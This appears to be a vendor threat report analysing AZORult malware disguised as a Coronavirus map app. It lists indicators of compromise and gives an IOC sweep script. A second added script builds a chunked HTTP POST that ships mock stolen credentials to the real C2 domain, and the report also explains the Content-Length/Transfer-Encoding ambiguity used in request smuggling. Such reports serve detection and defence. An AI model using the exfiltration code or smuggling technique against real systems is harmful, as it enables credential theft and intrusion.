COVID-19, Info Stealer & the Map of Threats; Threat Analysis Report

Executive Summary

As global awareness of the COVID-19 pandemic gives way to full-blown panic, and as governments ramp up their efforts to combat the virus and protect their citizens, news agencies find themselves racing to meet the public’s demand for accurate information about new infections, deaths and transmission.

This demand creates an opening that malicious actors have quickly exploited by spreading malware disguised as a “Coronavirus map”. ReasonLabs researcher Shai Alfasi found new malware that weaponizes a coronavirus map application to steal credentials such as user names, passwords, credit card numbers and other sensitive information stored in the user’s browser. Attackers can use this information for many other operations as well, such as selling it on the dark web or gaining access to bank accounts or social media.

The new malware deploys a strain of malicious software known as AZORult. AZORult is an information stealer first discovered in 2016. It is used to steal browsing history, cookies, IDs/passwords, cryptocurrency wallets and more, and it can also download additional malware onto infected machines. AZORult is commonly sold on Russian underground forums for the purpose of collecting sensitive data from an infected computer. There is also a variant of AZORult that creates a new, hidden administrator account on the infected machine in order to allow Remote Desktop Protocol (RDP) connections. As the coronavirus continues to spread and more apps and technologies are developed to monitor it, we will likely see an increase in corona-themed malware and its variants well into the foreseeable future.

Sample Analyzed

VirusTotal

  • File Name Corona-virus-Map.com.exe
  • MD5 73da2c02c6f8bfd4662dc84820dcd983
  • SHA-1 949b69bf87515ad8945ce9a79f68f8b788c0ae39
  • SHA-256 2b35aa9c70ef66197abfb9bc409952897f9f70818633ab43da85b3825b256307
  • File Size 3.26 MB (3421696 bytes)
  • File Type Win32 EXE
  • First Submission 2020-03-02 16:50:25

The malware has a polished and convincing GUI. When it runs, the window loads live statistics that it pulls from the web.

ק.png

The malware uses several layers of packing and a multi-process execution chain to make analysis harder. Its information-stealing component uses a technique first seen in 2016 in the “AZORult” malware family. For persistence it uses the Windows “Task Scheduler”.

Indicators of Compromise: 

Created files (grouped by the process that created them):

Corona-virus-Map.com.exe
  • C:\Users\%username%\AppData\Local\Temp\aut9BDA.tmp
  • C:\Users\%username%\AppData\Roaming\Z11062600\Corona[.]exe
  • C:\Users\%username%\AppData\Local\Temp\aut9DFE.tmp
  • C:\Users\%username%\AppData\Roaming\Z11062600\Corona-virus-Map.com[.]exe
Corona.exe
  • C:\Users\%username%\AppData\Local\Temp\RarSFX0\Corona[.]bat
  • C:\Users\%username%\AppData\Local\Temp\RarSFX0\Corona.sfx[.]exe
  • C:\Users\%username%\AppData\Local\Temp\autA83E.tmp
  • C:\Users\%username%\AppData\Roaming\Z58538177\bin[.]exe
  • C:\Users\%username%\AppData\Local\Temp\autAAB0.tmp
  • C:\Users\%username%\AppData\Roaming\Z58538177\Build[.]exe
Bin.exe
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll            
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll            
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dll            
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\freebl3.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\mozglue.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\msvcp140.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\nss3.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\nssdbm3.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\softokn3.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\ucrtbase.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\vcruntime140.dll
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\ENU_64B5614D0F4B35423983
Windows.Globalization.Fontgroups.exe
  • C:\Users\%username%\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D
  • C:\Users\%username%\AppData\Local\Temp\autB628.tmp
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\Windows.Globalization.Fontgroups.sqlite3.module.dll.2
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\Windows.Globalization.Fontgroups.sqlite3.module.dll
  • C:\Users\%username%\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771
  • C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE\2KY2PE8H\getMe[1].json
  • C:\Users\%username%\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_74167E25E5476CCA2A5946AAA61BF9E1
  • C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE\1OZ94YX5\json[1].json
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\1\Information.txt
  • C:\Users\%username%\AppData\Local\Temp\autCC51.tmp
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\Windows.Globalization.Fontgroups.module.exe.2
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\Windows.Globalization.Fontgroups.module.exe
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\ENU_64B5614D0F4B35423983.7z

Modified registry keys

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\Data\418A073AA3BC3475
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix
  • HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-3887374624-1885671809-3229943349-1001\\Device\HarddiskVolume4\Windows\SysWOW64\cmd.exe
  • HKCU\Software\Classes\Local Settings\MuiCache\56\52C64B7E\LanguageList

Mutexes Created:

  • \Sessions\1\BaseNamedObjects\A4B6CE24-E72D679B-BE9A182F-D7CE305A-FB62BB342
  • \Sessions\1\BaseNamedObjects\IESQMMUTEX_0_208
  • \Sessions\1\BaseNamedObjects\417087542ENU_FE97A6DDE921C7562535
  • \Sessions\1\BaseNamedObjects\MSIMGSIZECacheMutex
  • \Sessions\1\BaseNamedObjects\GdiplusFontCacheFileV1
  • \Sessions\1\BaseNamedObjects\Global\CPFATE_2304_v4.0.30319
  • \Sessions\1\BaseNamedObjects\Local\c:!users!user!appdata!roaming!microsoft!windows!ietldcache!
  • \Sessions\1\BaseNamedObjects\Local\_!MSFTHISTORY!_LOW!_
  • \Sessions\1\BaseNamedObjects\Local\c:!users!user!appdata!local!microsoft!windows!temporary internet files!low!content.ie5!
  • \Sessions\1\BaseNamedObjects\Local\c:!users!user!appdata!roaming!microsoft!windows!cookies!low!
  • \Sessions\1\BaseNamedObjects\Local\c:!users!user!appdata!local!microsoft!windows!history!low!history.ie5!
  • \Sessions\1\BaseNamedObjects\A4B6CE24-E72D679B-BE9A182F-DACC8B0F-7324685F3
  • \Sessions\1\BaseNamedObjects\417087542ENU_687FE9797AC054582535
  • \Sessions\1\BaseNamedObjects\Global\CPFATE_1308_v4.0.30319

Network communication

Process | IP address | URL
--- | --- | ---
Bin.exe | 104.24.103.192:80 | Coronavirusstatus[.]space/index.php
Windows.Globalization.Fontgroups.exe | 149.154.167.220:443 | api.telegram.org
Windows.Globalization.Fontgroups.exe | 104.26.9.44:443 | ipapi.co/json
Windows.Globalization.Fontgroups.exe | 93.184.220.29:80 | ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA%2Fz5hY5qj0aEmX0H4s05bY%3D
Corona-virus-Map.com.exe | 18.205.183.153:443 | gisanddata.maps.arcgis[.]com
Corona-virus-Map.com.exe | 54.192.87.49:443 | https://js.arcgis.com/3.31/dijit/form/_ListBase[.]js
Corona-virus-Map.com.exe | 54.192.87.49:443 | https://js.arcgis.com/3.31/dijit/form/MappedTextBox[.]js
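The indicators above can be turned into a host and log sweep. The script below is an added example and not ReasonLabs code: it transcribes a subset of the report’s file paths, the C2 domain and the SHA-256 values from the MetaData section, re-fangs them, and checks a host’s file system, file hashes and a resolver log. The DNS log lines at the bottom are constructed for the demonstration, and the existence check is injectable so the matching logic can be exercised on a machine that is not the infected one.

```python
"""IOC sweep for the Corona-virus-Map.com.exe / AZORult chain described above.

Added example, not ReasonLabs code. Indicators are transcribed from this
report (defanged exactly as printed); the DNS log lines at the bottom are
constructed for the demonstration.
"""
import hashlib
import os
import re
from typing import Callable, Iterable, List

# File-system indicators from the "Created files" list (subset).
FILE_IOCS = [
    r"C:\Users\%username%\AppData\Roaming\Z11062600\Corona[.]exe",
    r"C:\Users\%username%\AppData\Roaming\Z11062600\Corona-virus-Map.com[.]exe",
    r"C:\Users\%username%\AppData\Roaming\Z58538177\bin[.]exe",
    r"C:\Users\%username%\AppData\Roaming\Z58538177\Build[.]exe",
    r"C:\Users\%username%\AppData\Local\Temp\2fda\nss3.dll",
    r"C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\Windows.Globalization.Fontgroups.module.exe",
]

# C2 / exfiltration domain from the network table.
NET_IOCS = ["Coronavirusstatus[.]space"]

# SHA-256 values from the MetaData section.
SHA256_IOCS = {
    "2b35aa9c70ef66197abfb9bc409952897f9f70818633ab43da85b3825b256307",
    "0b3e7faa3ad28853bb2b2ef188b310a67663a96544076cd71c32ac088f9af74d",
    "13c0165703482dd521e1c1185838a6a12ed5e980e7951a130444cf2feed1102e",
    "fda64c0ac9be3d10c28035d12ac0f63d85bb0733e78fe634a51474c83d0a0df8",
    "126569286f8a4caeeaba372c0bdba93a9b0639beaad9c250b8223f8ecc1e8040",
    "203c7e843936469ecf0f5dec989d690b0c770f803e46062ad0a9885a1105a2b8",
}


def refang(indicator: str) -> str:
    """Undo the report's [.] defanging so the value can be matched."""
    return indicator.replace("[.]", ".")


def expand_path(ioc: str, username: str) -> str:
    """Substitute the %username% placeholder used in the report's paths."""
    return refang(ioc).replace("%username%", username)


def sweep_paths(username: str,
                exists: Callable[[str], bool] = os.path.exists) -> List[str]:
    """Return every report path present for this user. The existence check is
    injectable so the logic can be exercised on a non-Windows host."""
    return [p for p in (expand_path(i, username) for i in FILE_IOCS) if exists(p)]


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(1 << 20), b""):
            h.update(block)
    return h.hexdigest()


def sweep_hashes(paths: Iterable[str]) -> List[str]:
    """Return the given paths whose SHA-256 matches a hash from the report.
    Missing or unreadable files are skipped rather than aborting the sweep."""
    hits = []
    for p in paths:
        try:
            if sha256_of(p) in SHA256_IOCS:
                hits.append(p)
        except OSError:
            continue
    return hits


_DOMAIN_RE = re.compile(r"\b([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)\b")


def match_dns_log(lines: Iterable[str]) -> List[str]:
    """Flag log lines that name the C2 domain or any subdomain of it."""
    bad = {refang(d).lower() for d in NET_IOCS}
    hits = []
    for line in lines:
        for dom in _DOMAIN_RE.findall(line):
            dom = dom.lower()
            if dom in bad or any(dom.endswith("." + b) for b in bad):
                hits.append(line)
                break
    return hits


# Constructed resolver log (not from the report); only the first line should hit.
SAMPLE_DNS_LOG = [
    "2020-03-10 09:14:02 host1 A coronavirusstatus.space -> 104.24.103.192",
    "2020-03-10 09:14:05 host1 A js.arcgis.com -> 54.192.87.49",
    "2020-03-10 09:15:11 host2 A api.telegram.org -> 149.154.167.220",
]

if __name__ == "__main__":
    user = os.environ.get("USERNAME") or os.environ.get("USER") or "user"
    present = sweep_paths(user)
    print("files present:", present)
    print("hash hits    :", sweep_hashes(present))
    print("dns hits     :", match_dns_log(SAMPLE_DNS_LOG))
```

api.telegram.org and ipapi.co are deliberately left out of NET_IOCS: they are legitimate services the sample abuses, so matching on them alone would drown a SOC in false positives. Pair the hash check with the path check, since the Z-prefixed directory names may differ between builds.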

Execution Flow Summary

[Figure: execution flow diagram]

NOTE: js.arcgis.com is safe to visit.

Full analysis

After receiving the sample, I started with dynamic analysis. Executing the file “CoronaMap.exe” [PID 4280] opened a window that showed the following “CoronaVirus” statistics:

[Figure: the CoronaVirus statistics window shown by CoronaMap.exe]

Running procmon at the same time revealed the tree of sub-processes spawned by “CoronaMap.exe” [PID 4280], the root process.

[Figure: procmon process tree rooted at CoronaMap.exe]

“CoronaMap.exe” [PID 4280] starts by writing and launching another binary, “Corona.exe” [PID 7032]. It was easy to see that this file is an archive, which means it probably carries a script that executes its contents after extraction.

Simply by using WinRAR to view the archive, I found two files inside it, packaged in self-extracting (SFX) mode: “Corona.bat” and “Corona.sfx.exe”, both of which also appear in the procmon process tree. Opening “Corona.bat” showed that “Corona.sfx.exe” is extracted with a hardcoded password (3D2oetdNuZUqQHPJmcMDDHYoqkyNVsFk9r) into the “C:\windows\system32” directory:

[Figure: contents of Corona.bat]

“Corona.sfx.exe” [PID 3552] in turn extracts and launches another “Corona.exe” [PID 9452]. This process creates more processes, but we will focus on only three of them: “bin.exe” [PID 8604], “timeout.exe” [PID 5680] and “Build.exe” [PID 6348].

When I started analysing “bin.exe” [PID 8604] in OllyDbg, I could see it writing out several DLLs, one of which I already knew from other actors: “nss3.dll”, Mozilla’s Network Security Services library:

[Figures: bin.exe writing DLLs to disk, including nss3.dll]

Going deeper with OllyDbg, I saw the binary statically resolving APIs from “nss3.dll”. The code uses these NSS functions to decrypt the browser’s saved passwords and build its output data.

[Figure: nss3.dll API resolution in OllyDbg]

This technique is fairly common. I had come across it once before, and after some digging I found that this information-stealing routine comes from a malware family called “AZORult”, first seen in the wild in 2016. Its behaviour is as follows: once the victim is infected, the malware collects data and generates a unique ID for the victim’s workstation. It then XOR-encrypts the data using the generated ID. The ID is used to tag the workstation when C2 communication starts. The C2 server responds with configuration data containing target web browser names, browser path information, API names, sqlite3 queries and legitimate DLLs.

Tracing the API calls resolved from the loaded “nss3.dll” in OllyDbg, I saw the following:

  • sqlite3_open
  • sqlite3_close
  • sqlite3_prepare_v2
  • sqlite3_step
  • sqlite3_column_text
  • sqlite3_column_bytes
  • sqlite3_finalize
  • NSS_Init
  • PK11_GetInternalKeySlot
  • PK11_Authenticate
  • PK11SDR_Decrypt
  • NSS_Shutdown
  • PK11_FreeSlot

The password-stealing routine is simple: the malware copies the browser’s “Login Data” file to “C:\Windows\Temp” (the running browser keeps its own copy open) and reads it there. “Login Data” is a SQLite3 database, so the malware runs SQL queries against it to extract the saved credentials. Once extraction is finished, it writes everything to a file called “PasswordList.txt”.

[Figures: the Login Data query and the resulting PasswordList.txt]

As I kept digging through the code of “bin.exe” [PID 8604], I could see that the malware also looks for cryptocurrency wallets such as “Electrum” and “Ethereum”:

[Figure: cryptocurrency wallet paths searched by bin.exe]

It also looks for “Telegram Desktop”:

[Figure: Telegram Desktop lookup]

It searches for a “Steam” account:

[Figure: Steam account lookup]

It takes a screenshot and saves it as “scr.jpg”:

[Figure: screenshot routine writing scr.jpg]

It resolves the public IP address of the victim machine and saves it as “ip.txt”:

[Figures: public IP lookup and the resulting ip.txt]

It collects system information such as the OS version, architecture, hostname and username:

[Figure: system information collection]

As I continued with “bin.exe” [PID 8604], I found that the malware communicates with its C2 server at 104.24.103.192:80, which corresponds to http://coronavirusstatus[.]space/. Analysing the traffic, I found that “bin.exe” [PID 8604] sends its data with “chunked” transfer encoding, something we also see from other stealers in the wild: the client can stream the stolen data without declaring a Content-Length up front. Note that if a request carries both a Content-Length and Transfer-Encoding: chunked, and the Content-Length value is smaller than the chunked payload, a server that honours Content-Length will read only that many bytes and treat the leftover payload as the beginning of the next incoming request. This is how the malware sends out the information it steals:

[Figures: chunked C2 traffic to coronavirusstatus[.]space]
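The following is an added example, not the sample’s own traffic, that shows both sides of the exchange described above: a client that ships a payload to the C2 path with chunked transfer encoding, and a server/IDS-side parser that decodes it and flags the length ambiguity when Content-Length and Transfer-Encoding disagree. The host and path are taken from the network table; the payload is constructed.

```python
"""Chunked-transfer exfiltration request, plus the parser-side view of the
ambiguity described above. Added example, not the sample's traffic: the
payload is constructed; host and path come from the report's network table."""
from typing import Dict, List, Tuple

C2_HOST = "coronavirusstatus.space"
C2_PATH = "/index.php"
# Constructed stand-in for the stolen data the stealer ships to /index.php.
SAMPLE_PAYLOAD = b"PasswordList.txt\n" + b"https://mail.example.test alice hunter2\n" * 10


def chunked_body(payload: bytes, chunk_size: int = 64) -> bytes:
    """Encode payload as HTTP/1.1 chunks: hex size CRLF data CRLF ... 0 CRLF CRLF."""
    out = bytearray()
    for i in range(0, len(payload), chunk_size):
        piece = payload[i:i + chunk_size]
        out += b"%x\r\n" % len(piece) + piece + b"\r\n"
    out += b"0\r\n\r\n"                       # zero-length chunk ends the body
    return bytes(out)


def build_post(host: str, path: str, payload: bytes) -> bytes:
    """Client side: no Content-Length; the body length is only known once
    the terminating chunk arrives."""
    head = (f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
            "Transfer-Encoding: chunked\r\n"
            "Content-Type: application/octet-stream\r\n\r\n")
    return head.encode("ascii") + chunked_body(payload)


def decode_chunked(body: bytes) -> bytes:
    out = bytearray()
    pos = 0
    while True:
        nl = body.index(b"\r\n", pos)
        size = int(body[pos:nl].split(b";")[0], 16)   # ignore chunk extensions
        pos = nl + 2
        if size == 0:
            break
        out += body[pos:pos + size]
        pos += size + 2                                # data plus trailing CRLF
    return bytes(out)


def parse_request(raw: bytes) -> Tuple[Dict[str, str], bytes, List[str]]:
    """Server/IDS side. Returns (headers, body, warnings). Warnings cover the
    situation the text describes: a Content-Length that does not account for
    the whole payload, leaving bytes that a Content-Length-honouring server
    would read as the start of the next request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers: Dict[str, str] = {}
    for line in head.decode("latin-1").split("\r\n")[1:]:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    warnings: List[str] = []
    chunked = headers.get("transfer-encoding", "").lower() == "chunked"
    if chunked and "content-length" in headers:
        warnings.append("Content-Length and Transfer-Encoding both present; "
                        "a proxy and origin may disagree on where the body ends")
    if chunked:
        data = decode_chunked(body)
    else:
        n = int(headers.get("content-length", "0"))
        data = body[:n]
        if len(body) > n:
            warnings.append(f"{len(body) - n} byte(s) past Content-Length "
                            "would be read as the next request")
    return headers, data, warnings


if __name__ == "__main__":
    req = build_post(C2_HOST, C2_PATH, SAMPLE_PAYLOAD)
    hdrs, data, warns = parse_request(req)
    print(len(req), "bytes on the wire;", len(data), "bytes of payload;", warns)
```

For network detection, the useful signal is not the chunking itself (browsers and updaters use it constantly) but a POST with chunked encoding and an octet-stream body to a freshly registered domain from a process that is not a browser.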

Moving on to “timeout.exe” [PID 5680]: the malware author uses it to delay execution, a common trick for outlasting the time-limited scan of an AV sandbox. When I started analysing “Build.exe” [PID 6348], I saw a LoadLibrary of “taskschd.dll”, the Task Scheduler library, which I already knew from persistence mechanisms:

[Figure: LoadLibrary of taskschd.dll in Build.exe]

“Build.exe” [PID 6348] spawns a subprocess, “Windows.Globalization.Fontgroups.exe” [PID 3848], which is the binary the scheduled task runs for persistence.

When analysing “Windows.Globalization.Fontgroups.exe” [PID 3848], I could see that it was packed with UPX, which is easy to unpack.

[Figure: UPX-packed Windows.Globalization.Fontgroups.exe]

After unpacking it, I noticed another layer of packing, this time an AutoIt-compiled script (the source of the “aut*.tmp” files in the IOC list). Moving forward with the analysis, I found that this binary enumerates the OS for further browsers and resources it can steal information from:

[Figure: browser enumeration after unpacking]

“Windows.Globalization.Fontgroups.exe” [PID 3848] then creates a process called “Windows.Globalization.Fontgroups.module.exe” [PID 3848], which builds the 7z archive of all the collected information that “bin.exe” [PID 8604] sends out:

C:\Users\shy32\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\ENU_64B5614D0F4B35423983.7z

“Windows.Globalization.Fontgroups.exe” [PID 3848] runs “attrib.exe” [PID 8832] to set the hidden attribute on this directory:

[Figure: attrib.exe hiding the staging directory]

Remediation 

  • Download RAV Endpoint Protection.
  • Double-click the downloaded installer and follow the prompts to complete the installation.
  • Once the installation is complete, click ‘Finish’.
  • Definitions and security patches will automatically be updated.
  • Once the process is complete, select the ‘Scan Now’ button to start your scan.
  • When the scan is finished, select all the threats that were detected and then click on ‘Remove selected threats’.
  • When prompted, restart your computer.

MetaData

hashes

  • 2b35aa9c70ef66197abfb9bc409952897f9f70818633ab43da85b3825b256307
  • 0b3e7faa3ad28853bb2b2ef188b310a67663a96544076cd71c32ac088f9af74d
  • 13c0165703482dd521e1c1185838a6a12ed5e980e7951a130444cf2feed1102e
  • fda64c0ac9be3d10c28035d12ac0f63d85bb0733e78fe634a51474c83d0a0df8
  • 126569286f8a4caeeaba372c0bdba93a9b0639beaad9c250b8223f8ecc1e8040
  • 203c7e843936469ecf0f5dec989d690b0c770f803e46062ad0a9885a1105a2b8

Note

***The original Johns Hopkins University / ArcGIS coronavirus map hosted online is not infected or backdoored in any way and is safe to visit.